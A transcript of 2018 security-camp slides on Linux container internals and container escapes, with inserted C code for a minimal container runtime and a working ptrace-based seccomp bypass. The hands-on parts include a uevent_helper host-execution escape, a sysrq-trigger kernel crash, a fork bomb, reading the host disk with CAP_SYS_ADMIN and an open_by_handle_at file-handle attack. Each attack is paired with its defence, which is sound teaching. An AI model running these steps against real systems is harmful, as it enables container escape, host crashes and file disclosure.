コンテナの作り方、壊し方 / Container Structure and Exploitation Method

mrtc0
November 10, 2018

Slides from Security Mini Camp 2018 in Ehime. #seccamp

Transcript

  1. コンテナの作り方、壊し方 (Container Structure and Exploitation Method): let's get to know container security. Kohei Morita (@mrtc0), GMO Pepabo Inc. Security Mini Camp in Ehime.

  2. GMO Pepabo Security Office. Kohei Morita (@mrtc0). https://blog.ssrf.in

  3. About me: attended the Security Camp national event; lecturer for SECCON Beginners; did web vulnerability assessment part-time at Ierae Security while at university; IPA MITOU creator; joined GMO Pepabo Inc.

  4. #seccamp

  5. Introduction
      - These slides are a partially modified version of the material I presented with my colleague Uchio Kondo (@udzura) at the Kyushu Security Conference: "Understanding container security from the inside" (https://speakerdeck.com/udzura/inside-out-container-and-its-security).
      - The slides are reused and partially modified with his permission; many thanks to @udzura for agreeing so readily.

  6. Introduction
      - This session is mostly hands-on, so if you get stuck, ask the people near you or a tutor.
      - If a command fails or you do not know how to do something, just keep asking.
      - A cheat sheet is provided; please make use of it.
      - It is fine to work through the exercises while talking with your group. Please talk actively!

  7. Agenda: What is container virtualization? / Let's look inside how containers work / Let's build a container / The container security model and attack surfaces / Let's break a container

  8. Today's goals: get a rough understanding of how containers work; learn the security mechanisms containers rely on; experience the Swiss cheese model.

  9. What is container virtualization?

  10. Who has used the following software?

  11. (image only)
  12. (image only)
  13. (image only)
  14. Virtualization

  15. "Classic" virtualization (diagram): Hardware / Host OS or hypervisor / Hardware emulation x3 / Guest OS x3 / Libraries x3 / Programs x3

  16. (same diagram as slide 15)

  17. Container virtualization (diagram): Hardware / Host OS (Linux) / Container engine x3 / Libraries x3 / Programs x3. The OS functionality is shared: every container uses the same kernel as the host.

  18. Where are containers used?

  19. How containers are used (Kubernetes, see https://en.wikipedia.org/wiki/Kubernetes)

  20. Container security: (1) the implementation of the container runtime itself, (2) the container's security policy, (3) the container's network, (4) orchestration and managed services.

  21. Container implementations

  22. LXC, HACONIWA, rkt (logos)

  23. Container pros

  24. Container pros: (1) fast, lightweight startup; (2) resources can be controlled flexibly and at fine granularity.

  25. Container pros: (1) fast, lightweight startup; (2) flexible, fine-grained resource control. Well suited to the cloud: containerize the whole application, deploy and develop quickly.

  26. Container cons

  27. (chart: privilege separation against resource efficiency for hypervisor-based, software-based and container-based virtualization) Containers have weak privilege separation.

  28. Let's look inside a container (photo: flic.kr)

  29. How does a container become a container?

  30. Who has seen the following screen?

  31. (image only)
  32. (image only)
  33. Process

  34. A container is a process

  35. $ ./a.out (diagram: a.out -> libraries -> system calls -> Linux kernel)

  36. a.out
      $ ps xf -C a.out
      3262 ?      S    0:00 sshd: vagrant@pts/2
      3263 pts/2  Ss   0:00  \_ -bash
      3372 pts/2  S+   0:00      \_ ./a.out

  37. (same as slide 36)

  38. $ ./a.out (diagram): the parent process (bash etc.) calls fork(2) and wait(2); the child process calls execve(2) and becomes the new program, e.g. execve("/bin/cat", …)

  39. Same diagram, with "special processing" inserted between fork(2) and execve(2).

  40. A container is a special process

  41. Difference between an ordinary process and a container
      - A container is a special process.
      - Concretely: it is given resource spaces independent from the host, and limits are placed on the hardware resources it can use from the host. That is how each container gets its own isolated workspace.

  42. Same as slide 41, naming the two mechanisms: Linux Namespaces and cgroups.

  43. Confirm that "a container is a process"

  44. Starting a Docker container
      $ docker ps -a
      CONTAINER ID   IMAGE        COMMAND
      4521880cffa8   minicamp-1   "/usr/sbin/apache2ct…"
      $ docker start 4521
      $ curl localhost:8080 -s | grep '<title>'
      <title>Apache2 Ubuntu Default Page: It works</title>

  45. Check the process tree
      $ ps auxf
      $ sudo apt-get install apache2 && sudo systemctl start apache2
      (1) Look at the process tree Docker creates. (2) Start apache directly on the host and look at the process tree again.
  46. Linux Namespaces

  47. Checking Linux Namespaces
      $ docker ps
      CONTAINER ID   IMAGE        COMMAND
      4521880cffa8   minicamp-1   "/usr/sbin/apache2ct…"
      $ docker exec -ti 45 bash   # "attach" to the container
      # ip a                      # check the network inside the container
      # exit                      # leave the container
      $ ip a                      # compare with the host's network

  48. $ ip a   # host side
      2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
          link/ether 02:40:c1:fa:9b:f5 brd ff:ff:ff:ff:ff:ff
          inet 10.0.2.15/24 brd 10.0.2.255 scope global enp0s3
             valid_lft forever preferred_lft forever
          inet6 fe80::40:c1ff:fefa:9bf5/64 scope link
             valid_lft forever preferred_lft forever
      # ip a   # Docker container side
      10: eth0@if11: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
          link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
          inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
             valid_lft forever preferred_lft forever

  49. (same output as slide 48) Although the container is a process on the same machine, it has been given an independent network.

  50. Check the other Linux Namespaces too
      $ docker exec -ti 45 hostname
      4521880cffa8
      $ hostname
      ubuntu-xenial
      - Confirm that the hostname is different as well.

  51. Check the other Linux Namespaces too
      - Every process has a process ID (PID), but the numbering is "independent". Confirm that the same PID is assigned to different processes:
      $ docker exec -ti 45 ps auxf
      $ ps auxf

  52. Picture (diagram): host-1 192.168.1.1/24, container-1 172.16.1.1/24, container-2 10.1.1.1/24, all on one host OS (Linux). The processes are "isolated", but the OS functionality is shared with the host.

  53. Where do you check Namespaces?

  54. Looking at Namespaces
      $ ps auxf | grep -A 10 docker[d]   # find the PID of the container's Apache as seen from the host
      $ sudo ls -l /proc/$PID/ns         # inspect this directory
      $ sudo ls -l /proc/self/ns         # check the host side too and diff the two by eye

  55. $ sudo ls -l /proc/3625/ns
      total 0
      lrwxrwxrwx 1 root root 0 Nov  3 03:45 cgroup -> cgroup:[4026531835]
      lrwxrwxrwx 1 root root 0 Nov  3 03:08 ipc -> ipc:[4026532276]
      lrwxrwxrwx 1 root root 0 Nov  3 03:08 mnt -> mnt:[4026532274]
      lrwxrwxrwx 1 root root 0 Nov  3 02:55 net -> net:[4026532279]
      lrwxrwxrwx 1 root root 0 Nov  3 03:08 pid -> pid:[4026532277]
      lrwxrwxrwx 1 root root 0 Nov  3 03:45 user -> user:[4026531837]
      lrwxrwxrwx 1 root root 0 Nov  3 03:08 uts -> uts:[4026532275]
      $ sudo ls -l /proc/self/ns
      total 0
      lrwxrwxrwx 1 root root 0 Nov  3 03:45 cgroup -> cgroup:[4026531835]
      lrwxrwxrwx 1 root root 0 Nov  3 03:45 ipc -> ipc:[4026531839]
      lrwxrwxrwx 1 root root 0 Nov  3 03:45 mnt -> mnt:[4026531840]
      lrwxrwxrwx 1 root root 0 Nov  3 03:45 net -> net:[4026531957]
      lrwxrwxrwx 1 root root 0 Nov  3 03:45 pid -> pid:[4026531836]
      lrwxrwxrwx 1 root root 0 Nov  3 03:45 user -> user:[4026531837]
      lrwxrwxrwx 1 root root 0 Nov  3 03:45 uts -> uts:[4026531838]
      Diff them by eye: the container has its own ipc, mnt, net, pid and uts namespaces, while the cgroup and user namespace inode numbers are the same as the host's, i.e. those two are shared.

  56. Enter the Namespace
      - Attach to the network namespace only. (1) How does the output of ip a compare with the Docker host? (2) What does hostname print?
      $ sudo nsenter --net -t $PID
      $ sudo nsenter --uts -t $PID

  57. Linux Namespaces
      Namespace          | Summary
      PID namespace      | isolates PIDs
      Mount namespace    | isolates the filesystem tree
      IPC namespace      | isolates IPC
      Network namespace  | isolates network interfaces
      UTS namespace      | isolates the hostname
      User namespace     | isolates UIDs/GIDs

  58. cgroup

  59. Container pros: (1) fast, lightweight startup; (2) flexible, fine-grained resource control.

  60. Check the container's memory allocation
      $ CID=$(docker inspect -f '{{.ID}}' 45)
      $ sudo cat /sys/fs/cgroup/memory/docker/$CID/memory.usage_in_bytes
      $ sudo cat /sys/fs/cgroup/memory/docker/$CID/memory.limit_in_bytes
      Create a container with a smaller allocation and compare:
      $ CID2=$(docker run --memory=8m -d minicamp-1)
      $ sudo cat /sys/fs/cgroup/memory/docker/$CID2/memory.usage_in_bytes
      $ sudo cat /sys/fs/cgroup/memory/docker/$CID2/memory.limit_in_bytes
      (These are the cgroup v1 paths; on a cgroup v2 host the equivalent files are memory.current and memory.max under the container's cgroup directory.)

  61. Compare: confirm that the container's processing speed differs depending on whether a limit is set.
      $ docker exec -ti $CID bash
      $ docker exec -ti $CID2 bash
      - Run apt-get update in each.
      Then raise the memory limit directly and confirm that the behaviour improves:
      $ echo '128m' | sudo tee /sys/fs/cgroup/memory/docker/$CID2/memory.limit_in_bytes
      $ docker exec -ti $CID2 bash
      root@d6a2825b878a:/# apt-get update

  62. What cgroups can control: CPU, memory, disk I/O bandwidth, number of processes, etc.
  63. Let's build a container (photo: flic.kr)

  64. Haconiwa
      - A Linux container runtime developed by @udzura (GMO Pepabo) and others.
      - Its distinguishing feature is that configuration and hooks are written in mruby.
      - https://github.com/haconiwa/haconiwa
      $ haconiwa version
      haconiwa: v0.9.5

  65. Create an image (rootfs)
      $ mkdir /tmp/minicamp
      $ docker export 45 | sudo tar -xv -f - -C /tmp/minicamp/
      $ ls /tmp/minicamp/
      bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var

  66. Generate the configuration file
      $ haconiwa init first-container.haco
      assign new haconiwa name = haconiwa-4ad5ea68
      assign rootfs location = /var/lib/haconiwa/4ad5ea68
      create first-container.haco

  67. Edit the configuration
      # -*- mode: ruby -*-
      Haconiwa.define do |config|
        # The container name and container's hostname:
        config.name = "haconiwa-4ad5ea68"
        # The first process when invoking haconiwa run:
        config.init_command = "/bin/bash"
        # If your first process is a daemon, please explicitly daemonize by:
        # config.daemonize!
        . . .
        # The rootfs location on your host OS
        # Pathname class is useful:
        root = Pathname.new("/tmp/minicamp")
        config.chroot_to root
      end

  68. Start the container
      $ haconiwa run first-container.haco
      Create lock: #<Lockfile path=/var/lock/.haconiwa-4ad5ea68.hacolock>
      Container fork success and going to wait: pid=6855
      groups: cannot find name for group ID 1000
      root@haconiwa-4ad5ea68:/# ps ax
        PID TTY      STAT   TIME COMMAND
          1 pts/3    S      0:00 /bin/bash
          8 pts/3    R+     0:00 ps ax

  69. Let's build one from scratch

  70. First with just fork/execve/chroot (test.rb, run with hacorb, haconiwa's mruby interpreter)
      pid = Process.fork do
        Dir.chroot "/tmp/minicamp/"
        Dir.chdir "/"
        Exec.execve ENV, "/bin/bash"
      end
      p(Process.waitpid2 pid)

      $ hacorb test.rb
      bash-4.3$ pwd
      /
      bash-4.3$ ls
      bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var

  71. Isolate the PID namespace
      Namespace.unshare(Namespace::CLONE_NEWPID)
      pid = Process.fork do
        Dir.chroot "/tmp/minicamp/"
        Dir.chdir "/"
        Exec.execve ENV, "/bin/bash"
      end
      p(Process.waitpid2 pid)

      $ sudo hacorb test.rb
      bash-4.3$ mount -t proc proc /proc
      bash-4.3$ ps aux

  72. Set up a cgroup (cap the container at 3 processes)
      limit = "3"
      Namespace.unshare(Namespace::CLONE_NEWPID)
      pid = Process.fork do
        Dir.mkdir "/sys/fs/cgroup/pids/minicamp" rescue nil
        system "echo #{limit} > /sys/fs/cgroup/pids/minicamp/pids.max"
        system "echo #{Process.pid} > /sys/fs/cgroup/pids/minicamp/tasks"
        Dir.chroot "/tmp/minicamp/"
        Dir.chdir "/"
        Exec.execve ENV, "/bin/bash"
      end
      p(Process.waitpid2 pid)

      $ sudo hacorb test.rb
      # ( echo 'test' | cat )
      # bomb () { bomb | bomb & }; bomb

  73. Summary so far
      - Seen from the host, a container is just a process.
      - It combines the containerization features that Linux provides:
        - Namespaces make the process more independent
        - cgroups allocate resources
        - and there are others
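The three hacorb steps of slides 70-72 (fork/execve/chroot, a new PID namespace, a pids cgroup) written against the raw Linux syscalls in C. This is an added example, not code from the deck or from haconiwa. It assumes root, x86_64 Linux, the rootfs extracted to /tmp/minicamp on slide 65, and a cgroup v1 pids controller mounted at /sys/fs/cgroup/pids; the cgroup name minicamp is the one the script used. Beyond the mruby version it also unshares the UTS and mount namespaces, mounts a private /proc so ps inside shows only the container's PIDs, and makes the child wait until the parent has put it in the cgroup, so a fork bomb started from the shell is already capped:

```c
// Added example, not from the deck or haconiwa: slides 70-72 with raw syscalls.
// Assumes root, x86_64 Linux, a rootfs at /tmp/minicamp and a cgroup v1 pids
// controller at /sys/fs/cgroup/pids (group name "minicamp" as in the script).
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

#define STACK_SIZE (1024 * 1024)

struct child_args { const char *rootfs; const char *hostname; int wait_fd; };

/* Overwrite `path` with `value`. Returns 0 on success, -1 on failure. */
static int write_file(const char *path, const char *value) {
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0) return -1;
    ssize_t n = write(fd, value, strlen(value));
    close(fd);
    return n == (ssize_t)strlen(value) ? 0 : -1;
}

/* Create a pids cgroup, cap it at `limit` processes and move `pid` into it:
   the same effect as the two echo lines in the hacorb script on slide 72. */
int cgroup_apply_pids_limit(const char *cgroup_dir, int limit, pid_t pid) {
    char path[512], value[32];
    if (mkdir(cgroup_dir, 0755) < 0 && errno != EEXIST) return -1;
    snprintf(path, sizeof path, "%s/pids.max", cgroup_dir);
    snprintf(value, sizeof value, "%d", limit);
    if (write_file(path, value) < 0) return -1;
    snprintf(path, sizeof path, "%s/cgroup.procs", cgroup_dir);
    snprintf(value, sizeof value, "%d", (int)pid);
    return write_file(path, value);
}

/* Runs as PID 1 inside the new PID, UTS and mount namespaces. */
static int child_main(void *arg) {
    struct child_args *a = arg;
    char go;
    if (read(a->wait_fd, &go, 1) != 1) return 1;  /* wait for the cgroup to be applied */
    close(a->wait_fd);
    if (sethostname(a->hostname, strlen(a->hostname)) < 0) perror("sethostname");
    /* Private mount propagation: the /proc below never shows up on the host. */
    if (mount(NULL, "/", NULL, MS_REC | MS_PRIVATE, NULL) < 0) perror("mount private");
    if (chroot(a->rootfs) < 0 || chdir("/") < 0) { perror("chroot"); return 1; }
    /* Fresh procfs, so ps lists only the container's PIDs (slide 71). */
    if (mount("proc", "/proc", "proc", 0, NULL) < 0) perror("mount proc");
    char *const argv[] = { "/bin/bash", NULL };
    execv(argv[0], argv);
    perror("execv");
    return 1;
}

int main(int argc, char **argv) {
    int pipefd[2];
    if (pipe(pipefd) < 0) { perror("pipe"); return 1; }
    struct child_args a = { argc > 1 ? argv[1] : "/tmp/minicamp", "minicamp", pipefd[0] };
    char *stack = malloc(STACK_SIZE);
    if (!stack) return 1;
    int flags = CLONE_NEWPID | CLONE_NEWUTS | CLONE_NEWNS | SIGCHLD;
    pid_t pid = clone(child_main, stack + STACK_SIZE, flags, &a);
    if (pid < 0) { perror("clone (needs CAP_SYS_ADMIN)"); return 1; }
    /* Done from the parent with the host-side PID, before the child runs anything. */
    if (cgroup_apply_pids_limit("/sys/fs/cgroup/pids/minicamp", 3, pid) < 0)
        perror("cgroup (is the v1 pids controller mounted?)");
    if (write(pipefd[1], "x", 1) != 1) perror("write");  /* release the child */
    close(pipefd[1]);
    int status;
    waitpid(pid, &status, 0);
    printf("container exited: %d\n", WIFEXITED(status) ? WEXITSTATUS(status) : -1);
    return 0;
}

/* Self-check for the test: run cgroup_apply_pids_limit() against a scratch
   directory instead of the real cgroup filesystem and read the files back. */
int selftest_cgroup_writer(void) {
    char tmpl[] = "/tmp/minicamp-cg-XXXXXX", sub[512], path[512], buf[32];
    if (!mkdtemp(tmpl)) return 0;
    snprintf(sub, sizeof sub, "%s/minicamp", tmpl);
    if (cgroup_apply_pids_limit(sub, 3, 4242) < 0) return 0;
    const char *names[] = { "pids.max", "cgroup.procs" }, *want[] = { "3", "4242" };
    int ok = 1;
    for (int i = 0; i < 2; i++) {
        snprintf(path, sizeof path, "%s/%s", sub, names[i]);
        int fd = open(path, O_RDONLY);
        ssize_t n = fd < 0 ? -1 : read(fd, buf, sizeof buf - 1);
        if (fd >= 0) close(fd);
        if (n <= 0) return 0;
        buf[n] = '\0';
        ok = ok && strcmp(buf, want[i]) == 0;
    }
    return ok;
}
```

Build with `gcc -o minicontainer minicontainer.c` and run `sudo ./minicontainer /tmp/minicamp`; inside, `bomb () { bomb | bomb & }; bomb` fails with "Resource temporarily unavailable" as on slide 72, and `hostname` prints minicamp while the host's name is untouched. The pipe matters: without it the shell can start forking before the parent has written cgroup.procs, which is the window a fork bomb needs.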
  74. Break (photo: flic.kr)

  75. The container security model and attack surfaces (photo: flic.kr)

  76. Container security mechanisms
      - Isolation by Linux Namespaces
      - Resource control by cgroups

  77. Container security mechanisms
      - Isolation by Linux Namespaces
      - Resource control by cgroups
      - AppArmor
      - seccomp
      - Dropping permissions on specific files

  78. (container virtualization diagram from slide 17: the OS functionality is shared, and every container uses the same kernel as the host)

  79. Attack Surfaces (diagram): Kernel; Container x3; User; Security Policy

  80. Attack Surfaces: exploiting a kernel vulnerability

  81. Attack Surfaces: exploiting a container misconfiguration (e.g. docker --privileged)

  82. Attack Surfaces: exploiting a network misconfiguration

  83. (same as slide 82)

  84. The Swiss cheese model
      - Some of the security mechanisms used for containers overlap in function.
      - For example, a given system call may be blocked both by capabilities and by seccomp.
      - Even if one mechanism is bypassed, another one blocks or mitigates the attack.

  85. Let's break a container

  86. Container Security (table)
      Mechanism            | Purpose
      chroot / pivot_root  | isolation of OS resources (process, filesystem, etc.)
      Linux Namespaces     | isolation of OS resources (process, filesystem, etc.)
      seccomp              | restriction of privileges and features (syscalls)
      Linux Capabilities   | restriction of privileges and features (permissions)
      cgroups              | limits on OS resources (CPU, memory)
      SELinux / AppArmor   | access control (deny access to specific files)

  87. AppArmor

  88. AppArmor
      - A container shares some files with the host.
      - Some of those files affect the host if they can be read or written, e.g. /proc/kcore and /proc/sysrq-trigger.
      - They are mounted read-only or controlled with AppArmor.
      - Let's see what happens if they can be written to!

  89. /sys/kernel/uevent_helper
      - A uevent is an event the kernel sends when a device is added or removed.
      - When a uevent is sent, the kernel executes the program at the path written in uevent_helper (on the host, as root; this needs a kernel built with CONFIG_UEVENT_HELPER).
      - uevents can be sent from userland by writing to /sys/devices/virtual/mem/null/uevent or /sys/class/mem/null/uevent.

  90. Start the container and set it up
      $ haconiwa start sample1.haco
      root@sample:/# echo "export PATH=$PATH" >> /root/.bashrc
      root@sample:/# bash
      root@sample:/# apt-get install gcc

  91. Let's escape from the container
      $ haconiwa start sample1.haco
      root@sample:/# cat /root/hello.sh   # write it with your favourite editor
      #!/bin/sh
      echo "Hello, Host! ;)" > /tmp/hello.txt
      root@sample:/# chmod +x /root/hello.sh
      root@sample:/# echo "/var/lib/haconiwa/sample/root/hello.sh" > /sys/kernel/uevent_helper
      The path is the one the host sees: the container's rootfs lives under /var/lib/haconiwa/sample on the host, and the helper runs there, outside the container.

  92. Let's escape from the container
      $ ls /tmp/
      root@sample:/# echo change > /sys/class/mem/null/uevent
      $ ls /tmp
      hello.txt
      $ cat /tmp/hello.txt
      Hello, Host! ;)

  93. /proc/sysrq-trigger
      root@sample1:/# echo c > /proc/sysrq-trigger
      - Writing particular characters to /proc/sysrq-trigger can reboot the host or cause a kernel panic (c crashes the kernel, b reboots immediately).

  94. AppArmor
      deny /usr/bin/top mrwklx,   # deny read, write and execute of the top command
      - Mandatory access control (MAC) over files and sockets, applied per program.
      - mrwklx are the access modes: r is read, w is write, x is execute (m is mmap with PROT_EXEC, k is file locking, l is link).
      - http://manpages.ubuntu.com/manpages/bionic/man5/apparmor.d.5.html

  95. Let's block it
      $ cat apparmor/haconiwa-test
      …
      deny /usr/bin/top mrwklx,
      deny @{PROC}/sysrq-trigger rwklx,
      …
      - Apply the haconiwa-test profile to the sample1 container.

  96. Let's block it
      $ sudo cp apparmor/haconiwa-test /etc/apparmor.d/haconiwa/
      $ sudo apparmor_parser -Kr /etc/apparmor.d/haconiwa/haconiwa-test
      $ cat sample1.haco
      …
      config.apparmor = "haconiwa-test"
      …
      - Apply the haconiwa-test profile to the sample1 container.

  97. Let's block it
      $ haconiwa start sample1.haco
      root@sample1:/# top
      bash: /usr/bin/top: Permission denied
      root@sample1:/# echo c > /proc/sysrq-trigger
      bash: /proc/sysrq-trigger: Permission denied

  98. Protection with AppArmor
      - By mounting read-only or with AppArmor, you can restrict which commands a container can execute and which files it can read or write, e.g. /proc/sysrq-trigger, /proc/sys/kernel/core_pattern, /proc/sys/kernel/modprobe, /sys/kernel/uevent_helper.

  99. seccomp

  100. seccomp
      - A mechanism for filtering system calls.
      - Blocks dangerous system calls that would allow an escape to the host side.
      root@sample1:/# mkdir /tmp/hoge
      Bad system call

  101. Let's try seccomp
      $ cat sample2.haco
      config.seccomp.filter(default: :allow) do |rule|
        rule.kill :mkdir   # forbid mkdir(2)
      end
      $ sudo haconiwa start sample2.haco
      root@sample1:/# mkdir /tmp/hoge
      Bad system call

  102. Forbidden system calls
      syscall             | what it does
      kexec_load          | loads a new kernel
      init_module         | loads a kernel module
      finit_module        | loads a kernel module (from a file descriptor)
      delete_module       | removes a kernel module
      open_by_handle_at   | opens the file corresponding to a file handle
  103. Bypassing seccomp
      - A seccomp-based sandbox can be escaped.
      - Even if mkdir(2) is forbidden, it can be worked around.
      - Never allow the use of ptrace(2)!
      - A tracer can change the process's system call and so bypass the filter.
      - However, this only works on Linux kernels before 4.8.

  104. Let's bypass seccomp
      root@sample1:~/# ls
      bypass_seccomp.c
      root@sample1:~/# mkdir dir
      Bad system call
      root@sample1:~/# gcc bypass_seccomp.c
      root@sample1:~/# ./a.out
      root@sample1:~/# ls -al
      …
      drwxr-xr-x 2 root root 4096 Sep 10 12:27 dir   # created

  105. mkdir(2) -> seccomp -> Bad system call

  106. getpid(2) -> seccomp (allowed) -> ptrace: rewrite the state (registers) for calling getpid(2) into the state for calling mkdir(2) -> mkdir(2)

  107. ptrace
      Tracee:
      kill(getpid(), SIGSTOP);
      syscall(SYS_getpid, SYS_mkdir, "dir", 0777);
      Tracer, at the syscall-entry stop:
      if (regs.orig_rax == SYS_getpid) {
          regs.orig_rax = regs.rdi;
          regs.rdi = regs.rsi;
          regs.rsi = regs.rdx;
          regs.rdx = regs.r10;
          ptrace(PTRACE_SETREGS, pid, NULL, &regs);
      }
      Since Linux 4.8 the seccomp filter is evaluated after the ptrace syscall-entry stop, so the rewritten system call is filtered too and this trick no longer works.
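A complete version of the tracer/tracee sketch above, as an added example (not the deck's bypass_seccomp.c, which is not on the page). It assumes x86_64 Linux and uses only prctl(2), ptrace(2) and a four-instruction BPF filter; the directory name /tmp/seccomp-bypass-dir is made up. install_kill_filter() is also a minimal seccomp filter of the kind slide 101 configures, selftest_filter_kills() shows it working on any kernel, and try_bypass() reports whether the register rewrite got through, which on 4.8 and later it does not:

```c
// Added example, not from the deck: slide 107's ptrace trick completed.
// Assumes x86_64 Linux; the directory path used in main() is made up.
#define _GNU_SOURCE
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <signal.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/prctl.h>
#include <sys/ptrace.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>

/* Install a BPF filter: kill the process on syscall `blocked_nr`, allow the rest.
   PR_SET_NO_NEW_PRIVS lets an unprivileged process install it. */
int install_kill_filter(long blocked_nr) {
    struct sock_filter prog[] = {
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr)),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, (unsigned)blocked_nr, 0, 1),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
    };
    struct sock_fprog fprog = { sizeof prog / sizeof prog[0], prog };
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) < 0) return -1;
    return prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &fprog);
}

/* Fork a child that installs the filter and then makes the blocked call.
   Returns 1 if seccomp killed it with SIGSYS ("Bad system call"), else 0. */
int selftest_filter_kills(long nr) {
    pid_t pid = fork();
    if (pid < 0) return 0;
    if (pid == 0) {
        if (install_kill_filter(nr) < 0) _exit(2);
        syscall(nr);                     /* never returns if the filter works */
        _exit(0);
    }
    int status;
    waitpid(pid, &status, 0);
    return WIFSIGNALED(status) && WTERMSIG(status) == SIGSYS;
}

#ifdef __x86_64__
/* Tracee: getpid(2) is allowed, so call it, but pass mkdir's arguments. */
static void tracee(const char *dir) {
    if (install_kill_filter(SYS_mkdir) < 0) _exit(2);
    ptrace(PTRACE_TRACEME, 0, NULL, NULL);
    raise(SIGSTOP);                                   /* let the tracer attach */
    long rc = syscall(SYS_getpid, SYS_mkdir, dir, 0777);
    _exit(rc < 0 ? 1 : 0);
}

/* Tracer: at each syscall-entry stop turn a getpid into mkdir(dir, mode).
   Returns 1 if `dir` exists afterwards (bypass worked), 0 if seccomp won. */
int try_bypass(const char *dir) {
    pid_t pid = fork();
    if (pid < 0) return 0;
    if (pid == 0) tracee(dir);
    int status;
    waitpid(pid, &status, 0);                         /* the initial SIGSTOP */
    ptrace(PTRACE_SETOPTIONS, pid, NULL, (void *)(long)PTRACE_O_TRACESYSGOOD);
    for (;;) {
        if (ptrace(PTRACE_SYSCALL, pid, NULL, NULL) < 0) break;
        if (waitpid(pid, &status, 0) < 0 || !WIFSTOPPED(status)) break;
        if (WSTOPSIG(status) != (SIGTRAP | 0x80)) continue;   /* not a syscall stop */
        struct user_regs_struct regs;
        if (ptrace(PTRACE_GETREGS, pid, NULL, &regs) < 0) break;
        if (regs.orig_rax == SYS_getpid) {
            regs.orig_rax = regs.rdi;   /* SYS_mkdir */
            regs.rdi = regs.rsi;        /* path */
            regs.rsi = regs.rdx;        /* mode */
            regs.rdx = regs.r10;
            ptrace(PTRACE_SETREGS, pid, NULL, &regs);
        }
    }
    struct stat st;
    return stat(dir, &st) == 0 && S_ISDIR(st.st_mode);
}
#endif

int main(void) {
    printf("filter kills getppid: %s\n", selftest_filter_kills(SYS_getppid) ? "yes" : "no");
#ifdef __x86_64__
    const char *dir = "/tmp/seccomp-bypass-dir";      /* hypothetical path */
    rmdir(dir);
    if (try_bypass(dir)) printf("bypass worked: %s created (kernel < 4.8)\n", dir);
    else printf("seccomp held: mkdir still blocked (kernel >= 4.8, or ptrace denied)\n");
    rmdir(dir);
#endif
    return 0;
}
```

The tracee needs no privilege at all; what makes the attack possible is only that ptrace(2) itself is not filtered and CAP_SYS_PTRACE (or a Yama ptrace_scope that allows tracing descendants) is available, which is why slide 103 says never to allow ptrace in a seccomp-only sandbox. On a current kernel the loop ends with the tracee killed by SIGSYS at the rewritten entry, and try_bypass() returns 0.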
  108. Linux Capabilities

  109. Linux Capabilities
      - A mechanism for fine-grained control over the privileges that only root can use.
      - Grant or restrict just some of them.
      capability        | what it gates
      CAP_SYS_ADMIN     | mount(2) and much more
      CAP_SYS_CHROOT    | chroot(2)
      CAP_SYS_PTRACE    | ptrace(2)
      CAP_NET_RAW       | raw sockets (ping etc.)
      CAP_SYS_BOOT      | reboot(2) and kexec_load(2)

  110. Let's try capabilities
      $ haconiwa start sample3.haco
      root@sample1:/# ping 8.8.8.8
      PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
      64 bytes from 8.8.8.8: icmp_seq=1 ttl=63 time=5.54 ms
      ^C
      --- 8.8.8.8 ping statistics ---
      1 packets transmitted, 1 received, 0% packet loss, time 0ms

  111. Let's try capabilities
      root@sample1:/# mount /dev/sda1 /mnt/
      root@sample1:/# cat /mnt/etc/passwd
      root:x:0:0:root:/root:/bin/bash
      daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
      …
      vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash
      ubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash
      lxc-dnsmasq:x:112:117:LXC dnsmasq,,,:/var/lib/lxc:/bin/false
      With CAP_SYS_ADMIN (and a visible /dev/sda1) the container mounts the host's disk and reads the host's /etc/passwd.

  112. DROP the capabilities
      $ cat sample3.haco
      …
      config.capabilities.allow :all
      config.capabilities.drop "cap_sys_admin"
      config.capabilities.drop "cap_net_raw"
      …

  113. Without the privilege, the operations fail
      $ haconiwa start sample3.haco
      root@sample1:/# ping 8.8.8.8
      ping: icmp open socket: Operation not permitted
      root@sample1:/# mount /dev/sda1 /mnt/
      mount: permission denied

  114. Forbidden system calls (the table from slide 102): kexec_load loads a new kernel; init_module and finit_module load a kernel module; delete_module removes one; open_by_handle_at opens the file corresponding to a file handle.

  115. open_by_handle_at
      - A system call that opens the file referred to by a file handle.
      - Requires CAP_DAC_READ_SEARCH, which bypasses the read permission checks on files and directories.
      - Any file on the same filesystem as a bind-mounted directory becomes accessible.

  116. open_by_handle_at
      int open_by_handle_at(int mount_fd, struct file_handle *handle, int flags);
      struct file_handle {
          unsigned int  handle_bytes;   /* Size of f_handle [in, out] */
          int           handle_type;    /* Handle type [out] */
          unsigned char f_handle[0];    /* File identifier */
      };

  117. open_by_handle_at: the same struct; the leading bytes of f_handle hold the inode number of the file you want to open.

  118. open_by_handle_at
      $ stat /etc/passwd
        File: '/etc/passwd'
        Size: 1724   Blocks: 8   IO Block: 4096   regular file
      Device: 801h/2049d   Inode: 23125   Links: 1
      struct my_file_handle h = {
          .handle_bytes = 8,
          .handle_type = 1,
          // 23125 = 0x5a55, stored little-endian
          .f_handle = {0x55, 0x5a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}
      };

